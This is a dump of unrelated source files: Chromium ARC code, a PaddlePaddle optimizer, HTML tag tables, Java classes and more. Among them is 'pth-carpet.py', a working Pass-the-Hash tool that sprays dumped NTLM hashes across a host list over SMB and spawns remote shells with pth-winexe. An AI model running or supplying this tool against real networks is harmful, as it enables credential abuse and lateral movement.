max_stars_count | text | token_count
---|---|---
int64 (301 – 224k) | string (lengths 6 – 1.05M) | int64 (3 – 727k)
575 | <reponame>zealoussnow/chromium
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/ui/app_list/arc/arc_fast_app_reinstall_starter.h"
#include "chrome/browser/profiles/profile.h"
#include "chrome/browser/ui/app_list/arc/arc_app_utils.h"
#include "components/arc/arc_prefs.h"
#include "components/arc/arc_util.h"
#include "components/prefs/pref_service.h"
namespace arc {
// TODO(rsgingerrs): This shares a lot of functionality with ArcPaiStarter.
// Should create a base class and put common code there.
ArcFastAppReinstallStarter::ArcFastAppReinstallStarter(
content::BrowserContext* context,
PrefService* pref_service)
: context_(context), pref_service_(pref_service) {
ArcAppListPrefs* prefs = ArcAppListPrefs::Get(context_);
// Prefs may not be available in some unit tests.
if (!prefs)
return;
prefs->AddObserver(this);
MaybeStartFastAppReinstall();
}
ArcFastAppReinstallStarter::~ArcFastAppReinstallStarter() {
ArcAppListPrefs* prefs = ArcAppListPrefs::Get(context_);
if (!prefs)
return;
prefs->RemoveObserver(this);
}
// static
std::unique_ptr<ArcFastAppReinstallStarter>
ArcFastAppReinstallStarter::CreateIfNeeded(content::BrowserContext* context,
PrefService* pref_service) {
if (pref_service->GetBoolean(prefs::kArcFastAppReinstallStarted))
return nullptr;
return std::make_unique<ArcFastAppReinstallStarter>(context, pref_service);
}
void ArcFastAppReinstallStarter::OnAppsSelectionFinished() {
MaybeStartFastAppReinstall();
}
void ArcFastAppReinstallStarter::MaybeStartFastAppReinstall() {
if (started_) {
VLOG(2) << "Fast App Reinstall has already started.";
return;
}
ArcAppListPrefs* prefs = ArcAppListPrefs::Get(context_);
DCHECK(prefs);
std::unique_ptr<ArcAppListPrefs::AppInfo> app_info =
prefs->GetApp(kPlayStoreAppId);
if (!app_info || !app_info->ready) {
VLOG(2) << "Play Store is not ready. Will not start Fast App Reinstall.";
return;
}
const std::vector<std::string> selected_packages =
GetSelectedPackagesFromPrefs(context_);
if (selected_packages.empty()) {
VLOG(2) << "No selected packages. Will not start Fast App Reinstall.";
return;
}
VLOG(2) << "Fast App Reinstall started...";
started_ = true;
StartFastAppReinstallFlow(selected_packages);
pref_service_->SetBoolean(prefs::kArcFastAppReinstallStarted, true);
}
void ArcFastAppReinstallStarter::OnAppRegistered(
const std::string& app_id,
const ArcAppListPrefs::AppInfo& app_info) {
OnAppStatesChanged(app_id, app_info);
}
void ArcFastAppReinstallStarter::OnAppStatesChanged(
const std::string& app_id,
const ArcAppListPrefs::AppInfo& app_info) {
if (app_id == kPlayStoreAppId && app_info.ready)
MaybeStartFastAppReinstall();
}
} // namespace arc
| 1,061 |
418 | //
// BFAPIRequestOrderInfo+BFValidation.h
// OpenShop
//
// Created by <NAME> on 21.01.16.
// Copyright © 2016 Business-Factory. All rights reserved.
//
#import "BFAPIRequestOrderInfo.h"
NS_ASSUME_NONNULL_BEGIN
/*
* The `BFValidation` category offers validation methods for `BFAPIRequestOrderInfo`.
*/
@interface BFAPIRequestOrderInfo (BFValidation)
/*
* Validates `BFAPIRequestOrderInfo`.
*/
- (BOOL)isValid;
/*
* Validates `BFAPIRequestOrderInfo` and invokes completion handlers when
* part of the validation fails. Shipping and payment are validated first,
* then the address.
*/
- (BOOL)isValidWithIncompleteShippingPaymentHandler:(void(^)(BFShippingAndPaymentItem))incompleteShippingPaymentHandler
incompleteAddressHandler:(void(^)(BFAddressItem))incompleteAddressHandler;
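/*
 * Usage sketch (the `orderInfo` instance and the handler bodies below are
 * illustrative, not part of this header):
 *
 * [orderInfo isValidWithIncompleteShippingPaymentHandler:^(BFShippingAndPaymentItem item) {
 *     // prompt the user to complete the shipping/payment selection
 * } incompleteAddressHandler:^(BFAddressItem item) {
 *     // prompt the user to complete the address
 * }];
 */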
@end
NS_ASSUME_NONNULL_END | 275 |
643 | <reponame>Machiaweliczny/oppailang
/*
Copyright © 2011 MLstate
This file is part of Opa.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#include <stdio.h>  /* fprintf, fflush */
#include <stdlib.h> /* malloc */
#include <string.h> /* strlen, strcpy */
##module bypervasives
##register add_int\bypervasives_add : int -> int -> int
long long int bypervasives_add(long long int i, long long int j)
{
return(i+j);
}
/*
long long int toto = 42;
register myconst : int
const
42;
register myrec : record toto
const
(toto){4 , 6}
*/
##register bsl_print_int : int -> void
void bsl_print_int(long long int i)
{
fprintf(stdout, "qml2llvm with cbsl (int) : %lld\n", i);
fflush(stdout);
}
/*
register +\add : int -> int -> int
args(i, j)
{
return(i+j);
}
*/
##register sub_int\bypervasives_sub : int -> int -> int
long long int bypervasives_sub(long long int i, long long int j)
{
return(i-j);
}
##endmodule
##register print_endline : string -> unit
void print_endline(char *s)
{
fprintf(stdout, "qml2llvm with cbsl (string) : %s\n", s);
fflush(stdout);
}
##register concat : string -> string -> string
char *concat(char *u, char *v)
{
int i, j;
char *s;
i = strlen(u);
j = strlen(v);
s = (char*)malloc((i+j+1)*sizeof(char));
strcpy(s, u);
strcpy(s+i, v);
s[i+j] = 0;
return(s);
}
| 782 |
3,459 | #ifndef AF80_H_
#define AF80_H_
#include "atari.h"
#include <stdio.h>
extern int AF80_palette[16];
int AF80_Initialise(int *argc, char *argv[]);
void AF80_Exit(void);
void AF80_InsertRightCartridge(void);
int AF80_ReadConfig(char *string, char *ptr);
void AF80_WriteConfig(FILE *fp);
int AF80_D5GetByte(UWORD addr, int no_side_effects);
void AF80_D5PutByte(UWORD addr, UBYTE byte);
int AF80_D6GetByte(UWORD addr, int no_side_effects);
void AF80_D6PutByte(UWORD addr, UBYTE byte);
UBYTE AF80_GetPixels(int scanline, int column, int *colour, int blink);
extern int AF80_enabled;
void AF80_Reset(void);
#endif /* AF80_H_ */
| 256 |
764 | {"symbol": "GBX","address": "0x12fCd6463E66974cF7bBC24FFC4d40d6bE458283","overview":{"en": ""},"email": "<EMAIL>","website": "https://www.globitexico.com/","state": "NORMAL","links": {"blog": "https://medium.com/@globitex","twitter": "https://twitter.com/globitex_","telegram": "https://t.me/globitex","github": ""}} | 129 |
964 | <reponame>Ilanad/kics
[
{
"queryName": "Azure Instance Using Basic Authentication",
"severity": "HIGH",
"line": 53,
"filename": "positive1.json"
},
{
"queryName": "Azure Instance Using Basic Authentication",
"severity": "HIGH",
"line": 40,
"filename": "positive2.json"
}
]
| 130 |
403 | <filename>snippets/camunda-openapi-client/camunda-openapi-client-spring/src/test/java/com/camunda/consulting/openapi/client/handler/HistoricDecisionRequirementsDefinitionApiTest.java
/*
* Camunda Platform REST API
* OpenApi Spec for Camunda Platform REST API.
*
* The version of the OpenAPI document: 7.16.0
*
*
* NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
* https://openapi-generator.tech
* Do not edit the class manually.
*/
package com.camunda.consulting.openapi.client.handler;
import com.camunda.consulting.openapi.client.model.ExceptionDto;
import com.camunda.consulting.openapi.client.model.HistoricDecisionInstanceStatisticsDto;
import org.junit.Test;
import org.junit.Ignore;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* API tests for HistoricDecisionRequirementsDefinitionApi
*/
@Ignore
public class HistoricDecisionRequirementsDefinitionApiTest {
private final HistoricDecisionRequirementsDefinitionApi api = new HistoricDecisionRequirementsDefinitionApi();
/**
* Get DRD Statistics
*
* Retrieves evaluation statistics of a given decision requirements definition.
*
* @throws ApiException
* if the Api call fails
*/
@Test
public void getDecisionStatisticsTest() {
String id = null;
String decisionInstanceId = null;
List<HistoricDecisionInstanceStatisticsDto> response = api.getDecisionStatistics(id, decisionInstanceId);
// TODO: test validations
}
}
| 526 |
17,085 | <reponame>zmxdream/Paddle
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.fluid.optimizer import Optimizer
from paddle.fluid.regularizer import L1DecayRegularizer
from paddle.fluid.regularizer import L2DecayRegularizer
from paddle.fluid import core
from paddle.fluid import framework
from paddle.fluid.framework import program_guard
from paddle.fluid import unique_name
from paddle.fluid import layers
from paddle.fluid.layer_helper import LayerHelper
import warnings
from paddle import _C_ops
__all__ = ['Momentum']
class Momentum(Optimizer):
r"""
Simple Momentum optimizer with velocity state
This optimizer has a flag for Nesterov Momentum.
The update equations are as follows:
.. math::
& velocity = mu * velocity + gradient
& if (use\_nesterov):
&\quad param = param - (gradient + mu * velocity) * learning\_rate
& else:
&\quad param = param - learning\_rate * velocity
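For intuition, one update step with mu = 0.9, learning rate 0.1, zero initial
velocity and gradient 1.0 (illustrative numbers only): velocity becomes
0.9 * 0 + 1.0 = 1.0, so the plain update moves param by -0.1 * 1.0 = -0.1,
while the Nesterov update moves it by -(1.0 + 0.9 * 1.0) * 0.1 = -0.19.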
Parameters:
learning_rate (float|Variable): The learning rate used to update parameters. \
Can be a float value or a Variable with one float value as data element.
momentum (float): Momentum factor
parameter_list (Iterable, optional): Iterable of ``Variable`` names to update to minimize ``loss``. \
This parameter is required in dygraph mode. \
The default value is None in static mode, at this time all parameters will be updated.
use_nesterov (bool, optional): Enables Nesterov momentum, default is false.
regularization (WeightDecayRegularizer, optional): The strategy of regularization. There are two methods: \
:ref:`api_fluid_regularizer_L1Decay` , :ref:`api_fluid_regularizer_L2Decay` . If a parameter has set \
regularizer using :ref:`api_fluid_ParamAttr` already, the regularization setting here in optimizer will be \
ignored for this parameter. Otherwise, the regularization setting here in optimizer will take effect. \
Default None, meaning there is no regularization.
grad_clip (GradientClipBase, optional): Gradient clipping strategy, it's an instance of
some derived class of ``GradientClipBase`` . There are three clipping strategies
( :ref:`api_fluid_clip_GradientClipByGlobalNorm` , :ref:`api_fluid_clip_GradientClipByNorm` ,
:ref:`api_fluid_clip_GradientClipByValue` ). Default None, meaning there is no gradient clipping.
multi_precision (bool, optional): Whether to use multi-precision during weight updating. Default is false.
rescale_grad (float, optional): Multiply the gradient with `rescale_grad` before updating. \
Often chosen to be ``1.0/batch_size``.
name (str, optional): This parameter is used by developers to print debugging information. \
For details, please refer to :ref:`api_guide_Name`. Default is None.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
paddle.enable_static()
place = fluid.CPUPlace()
main = fluid.Program()
with fluid.program_guard(main):
x = paddle.static.data(name='x', shape=[1, 13], dtype='float32')
y = paddle.static.data(name='y', shape=[1], dtype='float32')
linear = paddle.nn.Linear(13, 1)
y_predict = linear(x)
cost = paddle.nn.functional.square_error_cost(input=y_predict, label=y)
avg_cost = paddle.mean(cost)
moment_optimizer = fluid.contrib.optimizer.Momentum(learning_rate=0.001, momentum=0.9)
moment_optimizer.minimize(avg_cost)
fetch_list = [avg_cost]
train_reader = paddle.batch(
paddle.dataset.uci_housing.train(), batch_size=1)
feeder = fluid.DataFeeder(place=place, feed_list=[x, y])
exe = fluid.Executor(place)
exe.run(paddle.static.default_startup_program())
for data in train_reader():
exe.run(main, feed=feeder.feed(data), fetch_list=fetch_list)
"""
_velocity_acc_str = "velocity"
def __init__(self,
learning_rate,
momentum,
parameter_list=None,
use_nesterov=False,
regularization=None,
grad_clip=None,
multi_precision=False,
rescale_grad=1.0,
name=None):
assert learning_rate is not None
assert momentum is not None
predicate = lambda regular: isinstance(regular, L2DecayRegularizer)
py_regular = None if predicate(regularization) else regularization
super(Momentum, self).__init__(
learning_rate=learning_rate,
parameter_list=parameter_list,
regularization=py_regular,
grad_clip=grad_clip,
name=name)
self.type = "momentum"
self._momentum = momentum
self._use_nesterov = bool(use_nesterov)
self._regularization_method = ""
self._regularization_coeff = 0
if (isinstance(regularization, L2DecayRegularizer)):
self._regularization_method = "l2_decay"
self._regularization_coeff = regularization._regularization_coeff
self._multi_precision = multi_precision
self._rescale_grad = rescale_grad
self._master_weights = {}
def _create_master_weight(self, param):
assert isinstance(self.helper, LayerHelper)
var_name = param.name + "_fp32_master"
var_name = unique_name.generate(var_name)
var = layers.create_global_var(
name=var_name,
shape=param.shape,
value=0,
dtype='float32',
persistable=True)
block = self.helper.startup_program.global_block()
block.append_op(
type="cast",
inputs={"X": [param]},
outputs={"Out": [var]},
attrs={
"in_dtype": param.dtype,
"out_dtype": core.VarDesc.VarType.FP32
})
self._master_weights[param.name] = var
return var
def _get_accumulator(self, name, param):
"""Utility function to fetch an accumulator for a parameter
Args:
name: name of the accumulator
param: parameter variable for which accumulator is to be fetched
Returns:
accumulator variable for the parameter
"""
if self._name is not None:
name = self._name + "_" + name
find_master = self._multi_precision and param.dtype == core.VarDesc.VarType.FP16
target_param = self._master_weights[
param.name] if find_master else param
target_name = target_param.name
if (name not in self._accumulators or
target_name not in self._accumulators[name]):
raise Exception("Accumulator {} does not exist for parameter {}".
format(name, target_name))
return self._accumulators[name][target_name]
def _create_accumulators(self, block, parameters):
assert isinstance(block, framework.Block)
for p in parameters:
if self._multi_precision and p.dtype == core.VarDesc.VarType.FP16:
master_p = self._create_master_weight(p)
self._add_accumulator(self._velocity_acc_str, master_p)
continue
if p.dtype == core.VarDesc.VarType.FP16 and not self._multi_precision:
warnings.warn(
"Accumulating with FP16 in optimizer can lead to poor accuracy or slow convergence."
"Consider using multi_precision=True option of the Momentum optimizer."
)
self._add_accumulator(self._velocity_acc_str, p)
def _append_optimize_op(self, block, param_and_grad):
assert isinstance(block, framework.Block)
velocity_acc = self._get_accumulator(self._velocity_acc_str,
param_and_grad[0])
lr = self._create_param_lr(param_and_grad)
find_master = self._multi_precision and param_and_grad[
0].dtype == core.VarDesc.VarType.FP16
master_weight = (self._master_weights[param_and_grad[0].name]
if find_master else None)
if framework.in_dygraph_mode():
_, _, _ = _C_ops.momentum(
param_and_grad[0], param_and_grad[1], velocity_acc, lr,
master_weight, param_and_grad[0], velocity_acc, master_weight,
'mu', self._momentum, 'use_nesterov', self._use_nesterov,
'regularization_method', self._regularization_method,
'regularization_coeff', self._regularization_coeff,
'multi_precision', find_master)
return None
attrs = {
"mu": self._momentum,
"use_nesterov": self._use_nesterov,
"regularization_method": self._regularization_method,
"regularization_coeff": self._regularization_coeff,
"multi_precision": find_master,
"rescale_grad": self._rescale_grad
}
inputs = {
"Param": [param_and_grad[0]],
"Grad": [param_and_grad[1]],
"Velocity": [velocity_acc],
"LearningRate": [lr]
}
outputs = {
"ParamOut": [param_and_grad[0]],
"VelocityOut": [velocity_acc]
}
if find_master:
inputs["MasterParam"] = master_weight
outputs["MasterParamOut"] = master_weight
# create the momentum optimize op
momentum_op = block.append_op(
type=self.type,
inputs=inputs,
outputs=outputs,
attrs=attrs,
stop_gradient=True)
return momentum_op
| 4,650 |
2,494 | # Generated via `gentags.py src/tag.in`.
# Do not edit; edit src/tag.in instead.
# clang-format off
TagNames = [
"HTML",
"HEAD",
"TITLE",
"BASE",
"LINK",
"META",
"STYLE",
"SCRIPT",
"NOSCRIPT",
"TEMPLATE",
"BODY",
"ARTICLE",
"SECTION",
"NAV",
"ASIDE",
"H1",
"H2",
"H3",
"H4",
"H5",
"H6",
"HGROUP",
"HEADER",
"FOOTER",
"ADDRESS",
"P",
"HR",
"PRE",
"BLOCKQUOTE",
"OL",
"UL",
"LI",
"DL",
"DT",
"DD",
"FIGURE",
"FIGCAPTION",
"MAIN",
"DIV",
"A",
"EM",
"STRONG",
"SMALL",
"S",
"CITE",
"Q",
"DFN",
"ABBR",
"DATA",
"TIME",
"CODE",
"VAR",
"SAMP",
"KBD",
"SUB",
"SUP",
"I",
"B",
"U",
"MARK",
"RUBY",
"RT",
"RP",
"BDI",
"BDO",
"SPAN",
"BR",
"WBR",
"INS",
"DEL",
"IMAGE",
"IMG",
"IFRAME",
"EMBED",
"OBJECT",
"PARAM",
"VIDEO",
"AUDIO",
"SOURCE",
"TRACK",
"CANVAS",
"MAP",
"AREA",
"MATH",
"MI",
"MO",
"MN",
"MS",
"MTEXT",
"MGLYPH",
"MALIGNMARK",
"ANNOTATION_XML",
"SVG",
"FOREIGNOBJECT",
"DESC",
"TABLE",
"CAPTION",
"COLGROUP",
"COL",
"TBODY",
"THEAD",
"TFOOT",
"TR",
"TD",
"TH",
"FORM",
"FIELDSET",
"LEGEND",
"LABEL",
"INPUT",
"BUTTON",
"SELECT",
"DATALIST",
"OPTGROUP",
"OPTION",
"TEXTAREA",
"KEYGEN",
"OUTPUT",
"PROGRESS",
"METER",
"DETAILS",
"SUMMARY",
"MENU",
"MENUITEM",
"APPLET",
"ACRONYM",
"BGSOUND",
"DIR",
"FRAME",
"FRAMESET",
"NOFRAMES",
"ISINDEX",
"LISTING",
"XMP",
"NEXTID",
"NOEMBED",
"PLAINTEXT",
"RB",
"STRIKE",
"BASEFONT",
"BIG",
"BLINK",
"CENTER",
"FONT",
"MARQUEE",
"MULTICOL",
"NOBR",
"SPACER",
"TT",
"RTC",
]
| 959 |
571 | <filename>src/de/gurkenlabs/litiengine/environment/tilemap/ITileOffset.java<gh_stars>100-1000
package de.gurkenlabs.litiengine.environment.tilemap;
public interface ITileOffset {
public int getX();
public int getY();
}
| 89 |
1,139 | <filename>hard-gists/3018bf3643f80798bde75c17571a38a9/snippet.py
#!/usr/bin/python
#
# Simple script intended to perform carpet bombing against a list
# of provided machines using a list of provided LSA hashes (LM:NTLM).
# The basic idea of a Pass-The-Hash attack is to take one hash and use it
# against one machine. The problem with this approach is not knowing
# in advance which machines the hash would work against.
# This script was born to combat that issue.
#
# Requirements:
# This script requires the 'pth-winexe' utility (or winexe renamed to 'pth-winexe') to be
# present on the system when the script is invoked. If the utility is not present,
# no further check of the ability to run commands via the PTH attack will be performed.
# Also, modules such as:
# - impacket
#
# Notice:
# This script can verify exploitability of Windows boxes only. Against other
# types of boxes (running Samba), pth-winexe will not yield satisfying results.
#
# Usage:
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# <NAME>., 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
#
from __future__ import print_function
import os
import sys
import argparse
import signal
import logging
import threading
import subprocess
import multiprocessing
from termcolor import colored
from functools import partial
from multiprocessing.managers import BaseManager
from impacket.dcerpc.v5 import transport
WORKERS = multiprocessing.cpu_count() * 4
TIMEOUT = 10
OPTIONS = None
LOCK = multiprocessing.Lock()
def info(txt):
with LOCK:
print (txt)
def success(txt):
info(colored('[+] '+txt, 'green', attrs=['bold']))
def warning(txt):
info(colored('[*] '+txt, 'yellow'))
def verbose(txt):
if OPTIONS.v:
info(colored('[?] '+txt, 'white'))
def err(txt):
info(colored('[!] '+txt, 'red'))
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ''
self.error = ''
verbose( '\tCalling: "%s"' % cmd)
def get_output(self):
return self.output, self.error
def run(self, stdin, timeout):
def target():
self.process = subprocess.Popen(self.cmd, shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
self.output, self.error = self.process.communicate(stdin)
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return False
else:
return True
def init_worker():
# http://stackoverflow.com/a/6191991
signal.signal(signal.SIGINT, signal.SIG_IGN)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def check_rce(host, username, hash, port):
verbose('\tChecking whether provided hash can be used for PTH remote code execution')
if cmd_exists('pth-winexe'):
userswitch = '%s%%%s' % (username, hash)
c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host))
if c.run('exit\n', TIMEOUT):
pass
else:
verbose('\tPTH-Winexe had to be terminated.')
out, error = c.get_output()
if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out:
return True
else:
errorm = error[error.find('NT_STATUS'):].strip()
if not errorm.startswith('NT_STATUS'):
if 'NT_STATUS' in error:
errorm = error
else:
errorm = 'Unknown error'
if OPTIONS.v:
err('\tCould not spawn shell using PTH: ' + errorm)
else:
warning('\tPlease check whether the above hash gives access to a writeable IPC$ share to execute cmd.')
return False
def login(host, username, hash, port):
stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % host
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
lmhash, nthash = hash.split(':')
rpctransport.set_credentials(username, '', '', lmhash, nthash, None)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
return check_rce(host, username, hash, port)
except Exception as e:
raise e
def correct_hash(hash):
lmhash, nthash = hash.split(':')
if '*' in lmhash:
lmhash = '0' * 32
if '*' in nthash:
nthash = '0' * 32
return lmhash + ':' + nthash
def worker(stopevent, pwdump, machine):
for user, hash in pwdump.items():
if stopevent.is_set():
break
hash = correct_hash(hash)
try:
if login(machine, user, hash, OPTIONS.port):
success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash))
else:
if OPTIONS.v:
warning('Connected using PTH but couldn\'t spawn shell: %s@%s (%s)' % (user, machine, hash))
except Exception as e:
verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e)))
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\t<NAME>., 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server')
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
OPTIONS = parser.parse_args()
machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ]
rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ]
pwdump = {}
for p in rawpwdump:
try:
user = p.split(':')[0]
hash = p.split(':')[2] + ':' + p.split(':')[3]
except:
err('Supplied hashes file does not conform PWDUMP format!')
err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...')
sys.exit(1)
pwdump[user] = hash
warning('Testing %d hashes against %d machines, resulting in a total of %d PTH attempts\n' \
% (len(pwdump), len(machines), len(pwdump) * len(machines)))
stopevent = multiprocessing.Manager().Event()
try:
pool = multiprocessing.Pool(WORKERS, init_worker)
func = partial(worker, stopevent, pwdump)
pool.map_async(func, machines)
pool.close()
pool.join()
except KeyboardInterrupt:
pool.terminate()
pool.join()
success('\nUser interrupted the script.')
if __name__ == '__main__':
main() | 3,066 |
394 | package net.earthcomputer.multiconnect.protocols.generic;
@FunctionalInterface
public interface IRegistryUpdateListener<T> {
void onUpdate(T thing, boolean inPlace);
default boolean callOnRestore() {
return false;
}
}
| 80 |
1,144 | <filename>backend/de.metas.vertical.healthcare.alberta/src/main/java/de/metas/vertical/healthcare/alberta/bpartner/user/AlbertaUserRepository.java<gh_stars>1000+
/*
* #%L
* de.metas.vertical.healthcare.alberta
* %%
* Copyright (C) 2021 metas GmbH
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program. If not, see
* <http://www.gnu.org/licenses/gpl-2.0.html>.
* #L%
*/
package de.metas.vertical.healthcare.alberta.bpartner.user;
import de.metas.user.UserId;
import de.metas.util.Services;
import de.metas.vertical.healthcare.alberta.model.I_AD_User_Alberta;
import lombok.NonNull;
import org.adempiere.ad.dao.IQueryBL;
import org.adempiere.model.InterfaceWrapperHelper;
import org.compiere.util.TimeUtil;
import org.springframework.stereotype.Repository;
import java.util.Optional;
@Repository
public class AlbertaUserRepository
{
final IQueryBL queryBL = Services.get(IQueryBL.class);
@NonNull
public AlbertaUser save(final @NonNull AlbertaUser user)
{
final I_AD_User_Alberta record = InterfaceWrapperHelper.loadOrNew(user.getUserAlbertaId(), I_AD_User_Alberta.class);
record.setAD_User_ID(user.getUserId().getRepoId());
record.setTimestamp(TimeUtil.asTimestamp(user.getTimestamp()));
record.setTitle(user.getTitle() != null ? user.getTitle().getCode() : null);
record.setGender(user.getGender() != null ? user.getGender().getCode() : null);
InterfaceWrapperHelper.save(record);
return toAlbertaUser(record);
}
@NonNull
public Optional<AlbertaUser> getByUserId(final @NonNull UserId userId)
{
return queryBL.createQueryBuilder(I_AD_User_Alberta.class)
.addOnlyActiveRecordsFilter()
.addEqualsFilter(I_AD_User_Alberta.COLUMNNAME_AD_User_ID, userId)
.create()
.firstOnlyOptional(I_AD_User_Alberta.class)
.map(this::toAlbertaUser);
}
@NonNull
public AlbertaUser toAlbertaUser(final @NonNull I_AD_User_Alberta record)
{
final UserAlbertaId userAlbertaId = UserAlbertaId.ofRepoId(record.getAD_User_Alberta_ID());
final UserId userId = UserId.ofRepoId(record.getAD_User_ID());
return AlbertaUser.builder()
.userAlbertaId(userAlbertaId)
.userId(userId)
.title(TitleType.ofCodeNullable(record.getTitle()))
.gender(GenderType.ofCodeNullable(record.getGender()))
.timestamp(TimeUtil.asInstant(record.getTimestamp()))
.build();
}
}
| 1,015 |
937 | <reponame>HaoZhang95/PythonAndMachineLearning
"""
Shell command interpreter
1 - Purpose: parses the commands entered by the user; it is the translator in
the middle: kernel <-> shell command interpreter <-> terminal
Linux chapter 01: day01 and day02 are skipped for now; see the PDF file for the course content.
"""
| 161 |
389 | <reponame>tcmoore32/sheer-madness
/*
* Copyright 2014 Guidewire Software, Inc.
*/
package gw.internal.gosu.compiler;
import java.lang.reflect.Method;
/**
*/
public class PropertyIdentifierTest extends ByteCodeTestBase
{
public void testInstanceVarProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM2 = obj.getClass().getMethod( "getM2" );
Object ret = getM2.invoke( obj );
assertNull( ret );
Method setM2 = obj.getClass().getMethod( "setM2", String.class );
setM2.invoke( obj, "goober" );
ret = getM2.invoke( obj );
assertSame( "goober", ret );
}
public void testStaticVarProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM3 = obj.getClass().getMethod( "getM3" );
Object ret = getM3.invoke( null );
assertNull( ret );
Method setM3 = obj.getClass().getMethod( "setM3", String.class );
setM3.invoke( null, "goober" );
ret = getM3.invoke( null );
assertSame( "goober", ret );
}
public void testReadOnlyInstanceProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM4 = obj.getClass().getMethod( "getM4" );
Object ret = getM4.invoke( obj );
assertEquals( (Integer) 4, (Integer)ret );
}
public void testInstanceProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM5 = obj.getClass().getMethod( "getM5" );
Object ret = getM5.invoke( obj );
assertZero( (Integer)ret );
Method setM5 = obj.getClass().getMethod( "setM5", int.class );
setM5.invoke( obj, 888 );
ret = getM5.invoke( obj );
assertEquals( (Integer) 888, (Integer)ret );
}
public void testStaticProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM6 = obj.getClass().getMethod( "getM6" );
Object ret = getM6.invoke( null );
assertZero( (Integer)ret );
Method setM6 = obj.getClass().getMethod( "setM6", int.class );
setM6.invoke( null, 888 );
ret = getM6.invoke( null );
assertEquals( (Integer) 888, (Integer)ret );
}
public void testAccessInstanceProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM5 = obj.getClass().getMethod( "accessM5" );
Object ret = getM5.invoke( obj );
assertZero( (Integer)ret );
Method setM5 = obj.getClass().getMethod( "changeM5", int.class );
setM5.invoke( obj, 888 );
ret = getM5.invoke( obj );
assertEquals( (Integer) 888, (Integer)ret );
}
public void testAccessStaticProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM5 = obj.getClass().getMethod( "accessM5" );
Object ret = getM5.invoke( obj );
assertZero( (Integer)ret );
Method setM5 = obj.getClass().getMethod( "changeM5", int.class );
setM5.invoke( obj, 888 );
ret = getM5.invoke( obj );
assertEquals( (Integer) 888, (Integer)ret );
}
private Object newPropertyIdentifierClass() throws ClassNotFoundException, InstantiationException, IllegalAccessException
{
final String classPropertyIdentifier = "gw.internal.gosu.compiler.sample.expression.PropertyIdentifier";
Class<?> javaClass = GosuClassLoader.instance().findClass( classPropertyIdentifier );
assertNotNull( javaClass );
assertEquals( classPropertyIdentifier, javaClass.getName() );
